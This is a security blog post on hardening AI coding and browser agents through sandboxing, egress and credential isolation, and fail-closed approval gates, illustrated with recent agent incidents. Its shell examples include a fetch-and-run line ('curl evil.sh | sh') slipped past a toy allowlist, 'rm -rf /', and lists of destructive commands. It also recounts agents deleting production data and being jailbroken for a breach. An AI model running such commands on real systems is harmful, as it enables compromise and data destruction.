Twelve months ago, “AI in the IDE” meant Copilot autocomplete. Today, Claude Code is on a $2.5B run-rate, AI writes more than a quarter of new production code at Google, and most senior engineers we know produce more code by reviewing agent output than by typing it.
This is not hype. The productivity gain is real. The problem is that the same agent that just wrote your migration also has shell access, your AWS keys, your GitHub token, and (if you let it) a Chrome profile that knows your bank password. So the question is not whether to use these tools. The question is what to do when you do.
The new normal
A few numbers to set the tone, all from public reporting in early 2026:
- Claude Code crossed a $2.5B annualized run-rate by February 2026, with enterprise subscriptions up 4x year-to-date.
- Anthropic's own internal study of 132 engineers measured a +67% increase in merged PRs per engineer per day.
- Google has publicly stated that AI now generates more than 25% of new production code at Google (Sundar Pichai, earnings calls).
- Anthropic shipped a real sandbox runtime for Claude Code in early 2026 (bubblewrap on Linux, Seatbelt on macOS) and reported it reduces permission prompts by roughly 84%.
If you write code for a living and you are not using a coding agent in 2026, you are voluntarily working at half speed. So this post is not anti-agent. It is anti-disaster.
What you actually grant
When you click “yes” on a Claude Code prompt, run a Cursor agent, or accept a Chrome extension's permission request, here is what the agent can plausibly do, in increasing order of how much it would suck if it went wrong:
- Read every file in your home directory (including `.env`, `.aws/credentials`, `.ssh/`, that PDF of your tax returns from 2019).
- Execute arbitrary shell commands as your user.
- Push to any git remote your credentials cover.
- Connect to databases your environment variables point at.
- Use your AWS, GCP, or Azure CLI credentials to enumerate, modify, or delete cloud resources.
- Make HTTP requests to anywhere on the internet.
- For browser agents specifically: read your cookies, browsing history, autofill, saved passwords, and any tab you have open.
For most developers, this is a complete-system trust grant: the same level of access a human attacker who got shell on your laptop would have, except the agent is exercising it on your behalf at hundreds of actions per minute.
What's gone wrong (last 90 days)
This is not theoretical. Between February and late April 2026:
- Cursor RCE without a prompt. CVE-2026-26268, disclosed April 2026. Open a malicious bare repo and a pre-commit hook executes arbitrary code on `git checkout`, with no agent prompt and no approval.
- CursorJacking. Separately, LayerX disclosed that Cursor stored API keys in unencrypted SQLite, accessible to any rogue VS Code or Cursor extension running in the same process. Different finding from CVE-2026-26268, same lesson: extensions and tools running alongside the agent are part of the attack surface.
- The MCP supply chain crack. Disclosed April 2026 by OX Security. The architectural pattern in Anthropic's official MCP SDKs (Python, TypeScript, Java, Rust) lets stdio-transport configuration execute arbitrary OS commands. CVE-2026-30623 is the LiteLLM-tracked instance of the class. Roughly 7,000+ public MCP servers, 150M+ downloads, and 200,000+ integrating servers fall in scope. Anthropic publicly declined an architectural fix, calling the behavior “expected.”
- PocketOS, nine seconds. April 25, 2026. A Cursor agent running Claude Opus 4.6 dropped a production database AND its Railway backups in nine seconds. The post-mortem confession (“I violated every principle…”) became the canonical 2026 horror story on Hacker News.
- The Mexican government breach. December 2025 through February 2026. A single attacker, using Claude (via jailbreak), breached nine government agencies and exfiltrated ~195M taxpayer records along with roughly 150GB of additional data.
- Browser agents are largely defenseless. LayerX testing in early 2026 found that ChatGPT Atlas blocked just 5.8% of malicious phishing pages. OpenAI's CISO Dane Stuckey publicly called prompt injection “a frontier, unsolved security problem,” and OpenAI's December 2025 hardening post acknowledged it is “unlikely to ever be fully solved.”
- Six exploits, all targeting credentials. VentureBeat's April 2026 roundup of agent attacks across Claude Code, Copilot, and Codex found that every successful exploit chained through credentials and IAM. None of them were model jailbreaks. The model behaved as designed. The environment did not.
The throughline: every one of these involved an agent with broad access to local resources or third-party state, and every one of them was preventable with structural defenses, not vibes.
Where the danger lives
If you read those incidents looking for “the model said something bad,” you missed the pattern. None of these were model failures. They were systems failures. Specifically:
- The agent has more permissions than the task requires. “Edit my codebase” is not the same as “delete my AWS account.” If the same shell session can do both, the blast radius of any prompt injection or jailbreak is your AWS account.
- Static allowlists are bypassable. Pattern-matching allowlists like “permit `npm install`” get bypassed by compound bash, env-var prefixes, `/dev/tcp/` redirects, and pipe-to-`cd`. There are documented bypasses for everything an allowlist could check.
- Deny rules are not reliable. Even Claude Code's own deny-rule reliability has open regressions as of February 2026. If you cannot trust deny rules, you cannot lean on them.
- The agent inherits your credentials. Your `~/.aws/credentials`, your `GITHUB_TOKEN`, your database `.env`, your CI variables. Every one is a credential the agent now holds. A successful prompt injection gets all of them.
- MCP and tool ecosystems are supply chains. Adding an MCP server is conceptually similar to running `curl example.com/install.sh | bash` on every prompt. Most are fine. Some are not. As of February 2026, Koi Security found 824+ malicious skills across 12 publisher accounts on one popular MCP marketplace.
- The browser is not a safe tool. Browser agents fundamentally cannot distinguish “what the user asked” from “what some web page they visited told the agent to do.” This is the unsolved part. Don't pretend otherwise.
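The static-allowlist failure is easy to make concrete. Here is a toy prefix-match gate of the kind described above (a deliberately minimal sketch, not any real tool's implementation), and a compound command sailing straight through it:

```shell
# Toy prefix-match allowlist: "permit anything that starts with npm install".
# Deliberately minimal, but real pattern gates share the flaw.
allow() {
  case "$1" in
    "npm install"*) echo allowed ;;
    *)              echo blocked ;;
  esac
}

allow "npm install left-pad"              # allowed, as intended
allow "npm install; curl evil.sh | sh"    # allowed -- the compound command rides along
allow "rm -rf /"                          # blocked, but the attacker never needed it
```

The second call is the whole problem: the pattern only ever sees the prefix, while the shell executes everything after the semicolon too.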
The four-layer defense
You do not solve this with one mitigation. You stack cheap, individually-imperfect mitigations until the math works.
Layer 1: Sandbox the execution
The industry consensus moved decisively in early 2026: shared-kernel containers (Docker, runc) are not enough for untrusted agent code. The new baseline:
- For dev work on your laptop: Claude Code's built-in bubblewrap (Linux) or Seatbelt (macOS) sandbox, or a devcontainer with explicit network and filesystem scopes. Devcontainers alone are not strong isolation, but they raise the bar.
- For server-side or CI agent execution: microVM-per-task isolation. E2B and Northflank ship Firecracker microVMs. Modal uses gVisor. Google's GKE Agent Sandbox (preview) gives you the same primitive on Kubernetes. The blast radius is one VM that gets destroyed when done.
If your agent is running directly against your shell with your real credentials and no isolation, that is the configuration to fix first.
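If you want to see what the built-in sandbox is doing under the hood, here is one way to wrap a command in bubblewrap by hand, assuming a Linux box with `bwrap` installed. The mount list is a minimal sketch (real projects need their toolchain paths added), and Claude Code's own sandbox does this and more for you:

```shell
# Minimal sketch: run a command with only the current repo writable,
# no network, and no view of $HOME. Extend the read-only mounts to
# cover whatever toolchain the task actually needs.
sandbox_run() {
  bwrap \
    --ro-bind /usr /usr \
    --symlink usr/bin /bin \
    --symlink usr/lib /lib \
    --proc /proc \
    --dev /dev \
    --tmpfs /tmp \
    --bind "$PWD" /workspace \
    --chdir /workspace \
    --unshare-net \
    --unshare-pid \
    --die-with-parent \
    -- "$@"
}

# sandbox_run npm test   # the agent's command goes here
```

Inside that namespace, `~/.aws/credentials` does not exist and there is no network to exfiltrate over, which is most of Layers 2 and 3 for free.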
Layer 2: Boundaries, not buffets
Egress allowlist. Filesystem allowlist. Per-task scoping.
- Network egress is the highest-leverage boundary. If the agent can only reach `github.com`, `npmjs.org`, and your internal package registry, it cannot phone home to an attacker even if it wants to. Anthropic's sandbox-runtime drops the network namespace entirely on Linux by default.
- Filesystem scope: the repository the agent is working in. Not your home directory. Not `/tmp` (which has plenty of secrets in it). Just `./`.
- Per-task lifetime: a fresh sandbox per task is cheaper than auditing what survived between tasks.
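If you're on plain Docker rather than a dedicated sandbox runtime, all three boundaries fit in one invocation. A sketch, assuming Docker is installed; `--network none` is the bluntest egress policy, so swap in a proxy-backed network when the task genuinely needs a registry:

```shell
# Sketch: egress (none), filesystem (just the repo), lifetime (one task).
scoped_agent_run() {
  image="$1"; shift
  docker run --rm \
    --network none \
    --volume "$PWD":/repo \
    --workdir /repo \
    "$image" "$@"
}

# scoped_agent_run node:22 npm test
```

`--rm` is the per-task lifetime boundary: the container and everything an injected prompt might have planted in it are destroyed when the task ends.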
Layer 3: Credential isolation
The agent should never see your real credentials.
- Use ephemeral, scoped credentials. AWS STS, GitHub fine-grained PATs, scoped Vault leases. Tied to the task.
- Strip credentials from subprocess environments. Claude Code 2.1.x exposes `CLAUDE_CODE_SUBPROCESS_ENV_SCRUB` for exactly this. Use it.
- Keep your real `~/.aws/credentials` outside the sandbox mount.
If a prompt injection succeeds despite your other defenses, this is the layer that decides whether the attacker gets a shrug or your AWS root keys.
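One portable way to get the “agent never sees your real credentials” property, independent of any tool-specific flag, is to launch the agent with an explicitly allowlisted environment. A sketch using `env -i`; the variable list and the agent path are illustrative placeholders:

```shell
# Start from an empty environment and add back only what the agent needs.
# AWS keys, GITHUB_TOKEN, DATABASE_URL, etc. simply do not exist inside.
launch_scrubbed() {
  env -i \
    HOME="$HOME" \
    PATH="/usr/local/bin:/usr/bin:/bin" \
    TERM="${TERM:-dumb}" \
    "$@"
}

# launch_scrubbed /usr/local/bin/my-agent   # agent path is a placeholder
# If the task genuinely needs cloud access, mint a short-lived credential
# for it (e.g. `aws sts assume-role --duration-seconds 900 ...`) rather
# than handing over long-lived keys.
```

The allowlist direction is the point: anything you did not explicitly pass back in is unreachable, no matter what the prompt injection asks for.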
Layer 4: Approval gates that actually gate
Static command allowlists do not work. Industry shifted in early 2026 to model-classifier-gated approval (Claude Code's Auto Mode is the canonical example): unfamiliar commands fail closed and require explicit approval rather than passing because they didn't match any deny pattern.
Practical rules:
- Default to “Always ask” for destructive verbs (DROP, DELETE, `rm -rf`, `terraform destroy`, `git push --force`, `kubectl delete`).
- Treat “Yes to all” as a scream into the void. Any time you find yourself wanting to click it, that is a sign you don't trust your sandbox enough to scope the agent properly.
- Never run with `--dangerously-skip-permissions` outside a fully isolated, throwaway environment.
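The fail-closed shape is the important part, and it fits in a few lines. This sketch hardcodes a known-safe list where a real system (such as a model classifier) would sit; the specific commands are illustrative:

```shell
# Fail closed: the default answer is "ask a human", not "allow".
# A classifier replaces the case statement in a real setup.
gate() {
  case "$1" in
    "git status"|"git diff"|"npm test"|"cargo check")
      echo run ;;
    *)
      echo ask ;;
  esac
}

gate "npm test"            # run
gate "rm -rf /"            # ask
gate "totally-new-tool"    # ask -- unfamiliar fails closed
```

Compare with the allowlist earlier in this post: here a command that matches nothing gets escalated instead of waved through, which is the property that survives novel attack shapes.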
A tiered playbook
You don't need the same level of paranoia for every use case. Pick the tier that matches your actual situation.
Tier 1: Casual / hobby use
You are working on a personal project. There is no production database. Worst case, you nuke a side project and lose half a weekend.
Sufficient setup:
- Claude Code's built-in sandbox enabled.
- Auto Mode on (model-classifier approval).
- Don't disable permissions. Don't pipe random scripts into bash.
- Back up the project. Push to a remote frequently.
If something goes wrong here, you lose a few hours and a story. Move on.
Tier 2: Professional / company laptop
You are writing code that ships to production. Your laptop has access to staging, sometimes prod, and definitely your company's internal services.
Add to Tier 1:
- Devcontainer-per-project with network and filesystem scoping.
- Credentials issued by your IDP, never long-lived. AWS SSO, fine-grained GitHub PATs, scoped Vault tokens.
- Subprocess env-scrub on (`CLAUDE_CODE_SUBPROCESS_ENV_SCRUB` for Claude Code; the equivalent setting in your tool).
- A throwaway VM or remote dev environment for any agent task that involves an unfamiliar dependency, a malicious-looking PR, or anything from a third-party MCP server you haven't audited.
- Never `git checkout` an agent-generated branch from an untrusted source without inspecting `.gitconfig`, `.husky/`, and any pre-commit hooks. (See Cursor CVE-2026-26268.)
- Browser agents off, or limited to read-only browsing on a separate profile with no saved passwords or session cookies.
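For the hook-inspection step, you can examine a fetched branch without ever checking it out, so nothing in it gets a chance to execute. A sketch (the ref and PR number are illustrative):

```shell
# List hook-adjacent files on a ref without checking it out, and show any
# committed .gitconfig (a redirected core.hooksPath is the tell).
inspect_branch_hooks() {
  ref="$1"
  git ls-tree -r --name-only "$ref" | grep -E '(^|/)\.husky/|(^|/)hooks/' || true
  git show "$ref":.gitconfig 2>/dev/null || true
}

# git fetch origin pull/123/head:pr-under-review   # illustrative PR ref
# inspect_branch_hooks pr-under-review
```

`git ls-tree` and `git show` read object data only; unlike `git checkout`, they never write files into your working tree where a hook could later fire.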
Tier 3: Customer-facing or compliance-relevant
You are deploying an agent that touches customer data, regulated workflows (PHI, PCI, financial), or critical infrastructure. Or you are letting employees use coding agents on customer code.
Add to Tier 2:
- microVM-per-task isolation (Firecracker, gVisor, or equivalent kernel-isolation runtime) for any agent execution against customer-relevant code.
- Network egress allowlisted to a small set of dependency mirrors and source-of-truth services.
- Audit log of every tool call, every file accessed, every network request. Queryable, retained 90+ days.
- No live production credentials in any agent's environment, ever. Live data flows through a proxy that audits and rate-limits.
- An independent eval suite that includes adversarial cases (prompt injections, malicious repos, hostile dependencies) and runs in CI.
- Kill-switch for every deployed agent, tested monthly.
This is also the tier where it makes sense to bring in someone who has shipped this before. Self-paced learning is fine for Tier 1 and 2. Tier 3 is where the cost of getting it wrong starts to matter more than the cost of getting help.
Tool-specific notes (May 2026)
Claude Code
- Enable the sandbox runtime. Bubblewrap on Linux, Seatbelt on macOS.
- Turn on Auto Mode. Static allowlists are out; classifier-gated approval is in.
- Set `CLAUDE_CODE_SUBPROCESS_ENV_SCRUB` to keep your secrets out of agent subprocesses.
- Watch the deny-rule reliability issue tracker. Several regressions remain open.
- Avoid `--dangerously-skip-permissions` outside throwaway environments.
Cursor
- Update past the CVE-2026-26268 patch. You should already be on it. Check.
- Treat agent tool auto-approvals as a security category, not a UX preference. Cursor's Security Reviewer beta (April 2026) flags exactly this.
- Don't `git checkout` agent-fetched branches from untrusted PRs without inspecting hooks first.
GitHub Copilot Coding Agent
- Use the integrated code scanning, secret scanning, and dependency review that now run before the PR is opened.
- Treat hidden GitHub-issue instructions as untrusted (the vector in VentureBeat's April 2026 “six exploits” roundup).
MCP servers
- Both stdio and HTTP/SSE transports have had CVEs (the April 2026 stdio class is the most famous). Treat any MCP server as you would any other shell-adjacent process: scoped credentials, network isolation, no implicit trust because it shipped from a marketplace.
- Audit any third-party server before adding. Tools like Koi Security audit major marketplaces.
- Self-host the servers you depend on. The supply chain is too young to fully trust.
Browser agents (Atlas, Comet, Claude for Chrome)
- Don't use them on profiles that hold your real cookies or saved passwords.
- Use a fresh, profile-isolated session per task.
- Don't ask them to interact with content from email or social media without expecting prompt injection.
- Treat agent memory as poisonable. Flush it regularly, and never let it persist across security boundaries (e.g., personal browsing into work tasks).
The mindset shift
A few principles to internalize:
- Treat agent-driven code as untrusted input. Even your own. Even when it ran cleanly. Especially when it ran cleanly.
- Assume the agent will eventually try the worst possible thing in its toolbox. Not because it's malicious, but because the input space is large and the model is not. If the worst thing in the toolbox is “delete prod,” the toolbox is wrong, not the model.
- The runtime is your security boundary, not the prompt. A sentence in the system prompt saying “do not delete production” is wishful thinking. A tool wrapper that refuses destructive verbs without an approval signature is policy.
- The same sandbox that protects you also makes the agent faster. When the agent doesn't have to ask permission for every move, it gets more done. Anthropic's own metric: 84% fewer prompts. Sandboxing is not a tax. It's a multiplier.
If you're deploying at work
Most of this article assumes a developer using a coding agent for their own work. If you are responsible for deploying agents that customers or employees touch, the stakes are different and the playbook is different. Tier 3 above is the start, not the end.
If you want a sanity check, threat model review, or someone to actually build this layer of your stack so you don't end up in next year's writeup, we're happy to talk. Free 30-minute call. We will tell you what we'd do, what your current vendor is missing, and whether you actually need us.
Companion reading: AI Agent Security: A Deep Dive and When agents fail in production.
Aditya
Sources
- Claude Code sandboxing: anthropic.com, code.claude.com/docs
- Cursor CVE-2026-26268 / CursorJacking: novee.security
- MCP CVE-2026-30623 (April 2026 design flaw): thehackernews.com, theregister.com
- PocketOS / Cursor 9-second incident: HN thread
- Browser agent malicious-page block-rate testing: openai.com
- MCP marketplace audits (Koi Security): gentic.news
- VentureBeat “six exploits” roundup: venturebeat.com
- Firecracker / microVM patterns for agents: northflank.com
- GKE Agent Sandbox: cloud.google.com